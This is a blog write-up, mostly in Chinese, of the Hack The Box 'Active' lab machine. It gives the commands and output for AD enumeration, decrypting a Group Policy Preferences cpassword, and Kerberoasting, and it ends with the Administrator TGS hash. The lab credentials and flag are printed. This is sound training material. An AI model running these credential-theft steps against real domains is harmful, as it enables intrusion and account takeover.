Skip to content

Active Writeup

免責聲明
我只是個初學者,但寫writeup能讓我變強,大概吧QQ
Please correct me if I'm wrong.

遇到不熟悉的技術,即使簡單也有點難。一直以來莫名的排斥Windows,沒有認真地理解Active Directory,真的非常愚蠢,所以把這次回顧多年前沒有完成的靶機,當作跨出的第一步吧!Active算是Hack The Box元老級的AD box了,同時也推薦在TJnull的OSCP靶機清單裡,適合新手練習AD相關技術,從如何使用SMB、解密GPP密碼1到Kerberoasting2取得Hash後暴力破解,都是基礎中的基礎。

Active Badge

靶機資訊(Machine Infromation)

Machine Description
Name Active
OS :simple-windows95: Windows
Difficulty Easy
Author eks mrb3n

情蒐(Reconnaissance)

服務掃描(Services Scan)

一如往常,把nmap掃描分兩次,第一次快速掃所有tcp ports,第二次選有興趣的ports詳細掃(-sC for default script scan, -sV for version detection),不然一開始就全掃會跑很久。這台靶機勢必設有Active Directory(AD),畢竟都叫Active了,對吧?若要實際點的話,在第一次快速掃瞄列出的不少Windows服務ports中出現:Kerberos, SMB, LDAP等,基本上就八九不離十了;如果看詳細一點的二次掃描就更清楚了。

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-05-29 02:20:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
...
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -3s
| smb2-time: 
|   date: 2023-05-29T02:20:58
|_  start_date: 2023-05-29T01:55:51
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required
bash
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ sudo nmap -p- --min-rate 4242 -o recons/nmap/active-alltcp-10.129.122.239 10.129.122.239 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 21:14 CDT
Nmap scan report for 10.129.122.239
Host is up (0.17s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown
49170/tcp open  unknown
49172/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds

┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ sudo nmap -sCV -o recons/nmap/active-targeted-cv-10.129.122.239 10.129.122.239
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 21:15 CDT
Nmap scan report for 10.129.122.239
Host is up (0.056s latency).
Not shown: 982 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-05-29 02:20:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -3s
| smb2-time: 
|   date: 2023-05-29T02:20:58
|_  start_date: 2023-05-29T01:55:51
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 320.83 seconds

話雖如此,但我這次懶得調整指令,所以直接全部詳細掃,想也知道一定掃非常久,所以在這段等待期間,就先嘗試其他手動探勘。目前最想找出domain name。當然,也可以去沖一杯咖啡,然後看到掃完結果的是active.htb

<MACHING_NAME>.htb 是HTB靶機hostname的常見命名規則。你可以在HTB Meta找到更多資訊。

LDAP詳列(LDAP Enumerate) - Port 389

因為快掃有列出LDAP,所以利用ldapsearch搜尋AD相關資訊,首先問出domain name:active.htb

ldapsearch
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ ldapsearch -x -H ldap://10.129.122.239 -b "" -s base defaultNamingContext
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: defaultNamingContext 
#

#
dn:
defaultNamingContext: DC=active,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
ldapsearch
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ ldapsearch -x -H ldap://10.129.122.239 -b 'DC=active,DC=htb' -D '' -w ''
# extended LDIF
#
# LDAPv3
# base <DC=active,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1

看來還是需要帳密才能進一步詳列資訊。

本階段其餘完成事項
Reverse DNS Search
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ dig -x 10.129.122.239

; <<>> DiG 9.18.12-1-Debian <<>> -x 10.129.122.239
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 15559
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 3b8c232ab38e91a3bfda3e4564740cfe6cdc017eb9b3576f (good)
;; QUESTION SECTION:
;239.122.129.10.in-addr.arpa.   IN      PTR

;; AUTHORITY SECTION:
10.in-addr.arpa.        86400   IN      SOA     localhost. . 1 28800 7200 604800 86400

;; Query time: 3 msec
;; SERVER: 192.168.1.1#53(192.168.1.1) (UDP)
;; WHEN: Sun May 28 21:25:02 CDT 2023
;; MSG SIZE  rcvd: 128
Zone Transfer
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ dig AXFR @10.129.122.239

; <<>> DiG 9.18.12-1-Debian <<>> AXFR @10.129.122.239
; (1 server found)
;; global options: +cmd
;; Query time: 52 msec
;; SERVER: 10.129.122.239#53(10.129.122.239) (UDP)
;; WHEN: Thu Jun 01 04:09:05 CDT 2023
;; MSG SIZE  rcvd: 40

I don't know why I even tried digging localhost at this point.

Localhost
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ dig localhost @10.129.122.239

; <<>> DiG 9.18.12-1-Debian <<>> localhost @10.129.122.239
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: FORMERR, id: 56014
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 847a6883003e4dbf (echoed)
;; QUESTION SECTION:
;localhost.                     IN      A

;; Query time: 63 msec
;; SERVER: 10.129.122.239#53(10.129.122.239) (UDP)
;; WHEN: Sun May 28 21:25:08 CDT 2023
;; MSG SIZE  rcvd: 50
bash
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

10.129.122.239   active.htb

SMB詳列(SMB Enumerate) - Port 445

先從試試看無帳密連線(Anonymous),也許可以取得一些共享資料夾,以下是幾種列出SMB Share的方式:

基本上用crackmapexec就不需要試其他兩個工具了,個人只是沒事想測測看而已。

bash
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ crackmapexec smb 10.129.122.239 -u '' -p '' --shares                        
SMB         10.129.122.239   445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.122.239   445    DC               [+] active.htb\: 
SMB         10.129.122.239   445    DC               [+] Enumerated shares
SMB         10.129.122.239   445    DC               Share           Permissions     Remark
SMB         10.129.122.239   445    DC               -----           -----------     ------
SMB         10.129.122.239   445    DC               ADMIN$                          Remote Admin
SMB         10.129.122.239   445    DC               C$                              Default share
SMB         10.129.122.239   445    DC               IPC$                            Remote IPC
SMB         10.129.122.239   445    DC               NETLOGON                        Logon server share 
SMB         10.129.122.239   445    DC               Replication     READ            
SMB         10.129.122.239   445    DC               SYSVOL                          Logon server share 
SMB         10.129.122.239   445    DC               Users
bash
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ smbmap -H 10.129.122.239
[+] IP: 10.129.122.239:445      Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS
bash
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ smbclient --no-pass -L //10.129.122.239                                                     
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.122.239 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

"Replication"是目前唯一具有讀取權限的share,其中文意思是"副本",也許是管理員的設定備份?因為有點好奇,於是SMB進去看看。

bash
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Replication]
└─$ smbclient //10.129.122.239/Replication 
Password for [WORKGROUP\xavier]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
.                                   D        0  Sat Jul 21 05:37:44 2018
..                                  D        0  Sat Jul 21 05:37:44 2018
active.htb                          D        0  Sat Jul 21 05:37:44 2018

                10459647 blocks of size 4096. 5202562 blocks available
smb: \> ls active.htb\
  .                                   D        0  Sat Jul 21 05:37:44 2018
  ..                                  D        0  Sat Jul 21 05:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 05:37:44 2018
  Policies                            D        0  Sat Jul 21 05:37:44 2018
  scripts                             D        0  Wed Jul 18 13:48:57 2018

                10459647 blocks of size 4096. 5202927 blocks available
smb: \> 

一共列出3個資料夾:DfsrPrivatePoliciesscripts,由於第一眼看不出所以然,於是問問ChatGPT。

Question: Where do following three directories: "DfsrPrivate", "Policies" and "Scripts" come from and what's the purpose of them in AD?

ChatGPT:
The "DfsrPrivate," "Policies," and "Scripts" directories are all related to Active Directory (AD) and serve specific purposes within the system.

  • DfsrPrivate:
    The "DfsrPrivate" directory is associated with the Distributed File System Replication (DFSR) service in Windows Server. DFSR enables the replication of files between multiple servers and ensures that the data remains consistent across all replicas. The "DfsrPrivate" directory is automatically created on each DFSR member server and contains the private metadata and staging files necessary for replication. It is a hidden system folder that should not be manually modified or deleted.
  • Policies:
    The "Policies" directory is a crucial component of Group Policy in AD. Group Policy allows administrators to manage and configure various settings for user and computer accounts in an organization. The "Policies" directory, located within the SYSVOL shared folder on domain controllers, stores Group Policy objects (GPOs). GPOs contain the settings and preferences that are applied to the targeted user and computer accounts. The "Policies" directory structure organizes GPOs into individual folders based on globally unique identifiers (GUIDs) and version numbers.
  • Scripts:
    The "Scripts" directory is associated with logon and logoff scripts in AD. Logon and logoff scripts are executed when users log on to or log off from a computer in an AD domain. These scripts can perform various tasks, such as mapping network drives, configuring printers, or running custom commands or applications. The "Scripts" directory, located within the SYSVOL shared folder on domain controllers, stores the scripts that are assigned to users or computers through Group Policy. The scripts can be written in different scripting languages, such as VBScript or PowerShell.

In summary, the "DfsrPrivate" directory is used by the DFSR service for file replication, the "Policies" directory is used to store Group Policy objects, and the "Scripts" directory is used to store logon and logoff scripts for executing specific actions during user sessions in an Active Directory environment.

ChatGPT長篇大論的重點是Policies儲存在SYSVOL,而且剛才列出shares也有出現SYSVOL(沒有讀取權限),到此為止,我更確定Replication是備份檔了。雖然可以在SMB慢慢往下找看是否有有趣的檔案,但是我想要下載整個資料夾下來:

smbclient //10.129.122.239/Replication
smb: \> mask ""
smb: \> recurse on  # 下載所有資料夾與檔案
smb: \> prompt off  # 關閉就不須每一個檔案都回覆"yes"
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (7.2 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (2.3 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4.6 KiloBytes/sec) (average 2.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (9.3 KiloBytes/sec) (average 4.1 KiloBytes/sec)
smb: \> 
List Directory
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Replication]
└─$ smbmap -H 10.129.122.239 -R Replication
[+] IP: 10.129.122.239:445       Name: active.htb                                        
    Disk                                                    Permissions     Comment
    ----                                                    -----------     -------
    Replication                                             READ ONLY
    .\Replication\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    active.htb
    .\Replication\active.htb\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    DfsrPrivate
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Policies
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    scripts
    .\Replication\active.htb\DfsrPrivate\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ConflictAndDeleted
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Deleted
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Installing
    .\Replication\active.htb\Policies\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    {31B2F340-016D-11D2-945F-00C04FB984F9}
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    {6AC1786C-016F-11D2-945F-00C04fB984F9}
    .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    fr--r--r--               23 Sat Jul 21 05:38:11 2018    GPT.INI
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Group Policy
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    MACHINE
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    USER
    .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    fr--r--r--              119 Sat Jul 21 05:38:11 2018    GPE.INI
    .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Microsoft
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Preferences
    fr--r--r--             2788 Sat Jul 21 05:38:11 2018    Registry.pol
    .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Windows NT
    .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Groups
    .\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    fr--r--r--               22 Sat Jul 21 05:38:11 2018    GPT.INI
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    MACHINE
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    USER
    .\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Microsoft
    .\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Windows NT

從Group Policy Preferences中竊取User密碼

把所有的檔案都看一便,只有Groups.xml有點意思,裡面寫了username和cpassword。

active.htb/Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

簡單上網搜尋"group.xml hack",就找到從Group Policy Preferences竊取密碼3的文章,內容基本上是說:XML裡面的cpassword就是AES-256加密後的使用者密碼,不需要暴力破解,就可輕易解密,誰叫微軟在官方技術文件中公開加密金鑰?!同時我也在XML裡面找到AD使用者帳號:active.htb\SVC_TGS

詳細內容請參考,另一篇筆記:[透過『群組原則偏好設定』竊取密碼]/zh-tw/Credential-Access/exploit-group-policy-preferences)。

Crack the Hash
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Replication]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

SMB登入帳密:SVC_TGS:GPPstillStandingStrong2k18,可以取得更多shares。

更多可讀的shares
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ crackmapexec smb 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares                  
SMB         10.129.122.239   445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.122.239   445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SMB         10.129.122.239   445    DC               [+] Enumerated shares
SMB         10.129.122.239   445    DC               Share           Permissions     Remark
SMB         10.129.122.239   445    DC               -----           -----------     ------
SMB         10.129.122.239   445    DC               ADMIN$                          Remote Admin
SMB         10.129.122.239   445    DC               C$                              Default share
SMB         10.129.122.239   445    DC               IPC$                            Remote IPC
SMB         10.129.122.239   445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.122.239   445    DC               Replication     READ            
SMB         10.129.122.239   445    DC               SYSVOL          READ            Logon server share 
SMB         10.129.122.239   445    DC               Users           READ

smbmap或是crackmapexec詳列Users目錄,並在桌面上找到在使用者flag。

bash
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ smbmap -H 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users
[+] IP: 10.129.122.239:445       Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Users                                                   READ ONLY
...
.\Users\SVC_TGS\Desktop\*
        dr--r--r--                0 Sat Jul 21 10:14:42 2018    .
        dr--r--r--                0 Sat Jul 21 10:14:42 2018    ..
        fw--w--w--               34 Thu Jun  1 01:29:06 2023    user.txt
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ smbmap -H 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users -A user.txt
[+] IP: 10.129.122.239:445       Name: active.htb                                        
[+] Starting search for files matching 'user.txt' on share Users.
[+] Match found! Downloading: Users\SVC_TGS\Desktop\user.txt
Tip:或是指定檔案下載
bash
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ crackmapexec smb 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --share Users --get-file SVC_TGS/Desktop/user.txt user.txt 
SMB         10.129.122.239   445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.122.239   445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SMB         10.129.122.239   445    DC               [*] Copy SVC_TGS/Desktop/user.txt to user.txt
SMB         10.129.122.239   445    DC               [+] File SVC_TGS/Desktop/user.txt was transferred to user.txt
bash
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ crackmapexec smb 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'  -M spider_plus --only-files -o READ_ONLY=false   
SMB         10.129.122.239   445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.122.239   445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SPIDER_P... 10.129.122.239   445    DC               [*] Started spidering plus with option:
SPIDER_P... 10.129.122.239   445    DC               [*]        DIR: ['print$']
SPIDER_P... 10.129.122.239   445    DC               [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.129.122.239   445    DC               [*]       SIZE: 51200
SPIDER_P... 10.129.122.239   445    DC               [*]     OUTPUT: /tmp/cme_spider_plus
...

┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ find /tmp/cme_spider_plus/10.129.122.239 -type f 
...
/tmp/cme_spider_plus/10.129.122.239/Users/SVC_TGS/Desktop/user.txt
...
cat Desktop/user.txt
7d36c018659d1242bd474c297d965bdf

取得user flag之後就碰壁了,把所以Users目錄底下的檔案看一遍也沒有用,因為都是預設檔案,所以只能偷看其他人的Writeup,才注意到我完全忘了還有東西還沒看啊!

Kerberoasting - Port 88

不要小看無知的力量,完全忽略AD中重要一環Kerberos就是這麼厲害,只能先從爬文開始,才知道有Kerberoast這個技巧。簡單來說,Kerberoast濫用Kerberos機制取得Ticket Granting Service(TGS)後,離線暴力破解加密TGS的Service密碼。

詳細內容請參考,另一篇筆記:[Kerberoast:機制濫用與暴力破解]/zh-tw/Credential-Access/kerberoast)。

記得加入DC域名到/etc/hosts

bash
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ cat /etc/hosts     
127.0.0.1       localhost
127.0.1.1       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

10.129.122.239   active.htb dc.active.htb

取得TGS Hash

利用CrackMapExec進行kerberoasting,你也先可以用LDAP搜尋,確定是否存在具有servicePrincipalName的帳號,再取得它的TGS。

bash
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ crackmapexec ldap 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kerberoasting output.txt
SMB         10.129.122.239   445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
LDAP        10.129.122.239   389    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
LDAP        10.129.122.239   389    DC               [*] Total of records returned 1
CRITICAL:impacket:CCache file is not found. Skipping...
LDAP        10.129.122.239   389    DC               sAMAccountName: Administrator memberOf: CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb pwdLastSet: 2018-07-18 14:06:40.351723 lastLogon:2023-06-01 01:29:13.530504
LDAP        10.129.122.239   389    DC               $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$23c43ae62951b4c98375f7aaad3fad9a$c6d7a76920cde0b5b6ab6de83f3f319a333e4002b46aae47e26c8d33750e9fddf0bab41d071c27b16fe672b3d130004fbc014ef785a354ed34bb214e594f029227d491f0ee81d9aa7bfd5a266dca1f622a3dfb143104eea7a6904ed60a0a8017026644eb56c4e4d4896af44e41bced305b065664ab56f8865c3318f6592067bddbb624dd8ee17968080bd3a3d6965a82292a2e5a5e6da01e03ca8146cab3aefed941d356e4e61022338065d6791118c4ca33e2565532200e4daad24373ed6372283516c38a2a29d35d4871b6da2c30a7579ff0610aed49b33d60b27388d413ec427e4fda734688a3a7d938f8fd92ff31a44556d4bc73702f62622dc97510c31f1ed5ad28a8bf90bca7fc2143345ce996c0800d44760c671feb6f7e37649b0fcd961b5e64911d32a2dc2ce66aa48e4d5e463597c872ea884f60790843fbc8d2c2aabeb37037157323f9b9908896068019b153f76847c91b17acac2a414570fae1437f127867385fbf4afb63d955a4d81800170580524859867933897474d11b687955ea6e86c7fbac5b4586a51c7555e681cb2eb33745ff171d549523b3abc813b379f3e764a8e26a0cc9c834707d73b591276f04585a687ec95e01be5c6ea79fdda4c5fac9ba9e045c87c92ea517af0b84625b3bd4cbe22a4881d5f80f43065d6a6d222dad80104522500d8316607f245970a88ae55896618d69c9bb29d5cad7a0dcb09036649ddb21323047c85fb9be1718efdb5401047e2e0435abad297566b15254dad24984969d4081bbf9b614d1e3f8957102db434437010941867a7c14afa0374b3b6f05ff4b828